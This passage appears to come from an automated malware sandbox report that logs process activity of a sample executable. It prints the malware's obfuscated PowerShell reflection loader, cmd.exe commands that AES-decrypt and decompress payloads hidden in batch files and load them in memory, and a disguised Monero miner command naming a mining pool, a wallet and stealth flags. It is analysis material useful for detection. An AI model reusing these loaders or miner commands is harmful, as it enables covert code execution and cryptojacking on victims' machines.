$_.location.split('\')[-1].equals(''+'s'+''+[char](121)+''+[char](115)+''+[char](116)+''+[char](101)+''+[char](109)+''+[char](46)+''+[char](100)+''+[char](108)+'l')}).gettype(''+[char](77)+''+[char](105)+''+[char](99)+''+[char](114)+''+'o'+''+'s'+'o'+[char](102)+''+[char](116)+''+'.'+''+'w'+''+[char](105)+'n32'+[char](46)+'uns'+'a'+''+[char](102)+''+[char](101)+''+[char](78)+''+[char](97)+''+[char](116)+''+[char](105)+''+'v'+''+[char](101)+'m'+[char](101)+''+[char](116)+'h'+[char](111)+'d'+[char](115)+'');$onnlowkafauoge=$xabpoaxizgegr.getmethod(''+'g'+''+[char](101)+''+[char](116)+''+'p'+'r'+[char](111)+''+[char](99)+'a'+[char](100)+''+'d'+''+[cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:nyguwfckeoje{param([outputtype([type])][parameter(position=0)][type[]]$kiydauqzmkkpvq,[parameter(position=1)][type]$ozrvwwezvx)$jczrwmspqgk=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+'f'+[char](108)+''+[char](101)+''+'c'+'t'+[char](101)+''+[char](100)+''+'d'+'e'+'l'+''+[char](101)+''+'g'+''+[char](97)+''+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('in'+[char](77)+'e'+[char](109)+''+[char](111)+'ry'+[char](77)+''+'o'+''+'d'+'u'+[char](108)+''+'e'+'',$false).definetype(''+'m'+''+[char](121)+''+[char](68)+''+'e'+''+[char](108)+''+[char](101)+''+[char](103)+'a'+[char](116)+''+[char](101)+''+[char](84)+'yp'+'e'+'',''+'c'+''+'l'+''+'a'+''+'s'+'s,p'+[char](117)+''+[char](98)+''+[char](108)+''+'i'+'c'+','+''+[char](83)+''+[char](101)+''+'a'+'le'+'d'+''+[char](44)+''+'a'+''+[char](110)+''+[char](115)+''+[char](105)+''+'c'+''+[char](108)+''+'a'+''+[char](115)+'s'+[char](44)+''+[char](65)+'u'+'t'+'o'+[char](67)+''+'l'+''+'a'+'ss',[multicastdelegate]);$jczrwmspqgk.defineconstructor('rt'+[char](83)+''+[char](112)+''+[char](101)+''+[char](99)+''+[char](105)+'a'+'l'+''+[char](78)+''+[char](97)+''+[char](109)+''+'e'+','+'h'+'i'+[char](100)+'e'+[char](66)+''+[char](121)+''+[char](83)+'ig'+[char](44)+''+'p'+''+[char](117)+'b'+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$kiydauqzmkkpvq).setimplementationflags(''+[char](82)+''+[char](117)+''+'n'+''+[char](116)+'ime,'+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');$jczrwmspqgk.definemethod('i'+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+[char](101)+'',''+[char](80)+''+[char](117)+''+'b'+''+'l'+''+[char](105)+''+[char](99)+','+[char](72)+''+'i'+''+[char](100)+''+'e'+'b'+'y'+''+[char](83)+''+[char](105)+''+[char](103)+','+'n'+''+[char](101)+'w'+[char](83)+''+'l'+''+[char](111)+''+[char](116)+''+','+'v'+[char](105)+'rt'+[char](117)+''+[char](97)+''+[char](108)+'',$ozrvwwezvx,$kiydauqzmkkpvq).setimplementationflags('r'+'u'+''+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+'m'+''+[char](97)+''+[char](110)+''+'a'+'ge'+'d'+'');write-output $jczrwmspqgk.createtype();}$fmzqsfzpmgsno=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('s'+[char](121)+''+[char](115)+''+[char](116)+'em'+'.'+''+[char](100)+'ll')}).gettype(''+[char](77)+''+[char](105)+''+[char](99)+''+'r'+''+[char](111)+''+[char](115)+''+'o'+''+'f'+''+[char](116)+'.'+[char](87)+'in'+[char](51)+''+[char](50)+''+[char](46)+''+'u'+'ns'+'a'+''+'f'+''+'e'+''+[char](78)+''+'a'+'t'+[char](105)+''+'v'+'em'+[char](101)+''+[char](116)+''+'h'+'o'+[char](100)+''+[char](115)+'');$kczxemormgvaoj=$fmzqsfzpmgsno.getmethod(''+[char](71)+''+[char](101)+''+'t'+''+[
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 'c:\users\user\appdata\local\temp\b.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe c:\windows\explorer.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-stealth Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 94_2_0000000140002300
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 94_2_0000000140002300
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000025EE91C2AF0 cpuid 18_3_0000025EE91C2AF0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Queries volume information: C:\Users\user\Desktop\e7WMhx18XN.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
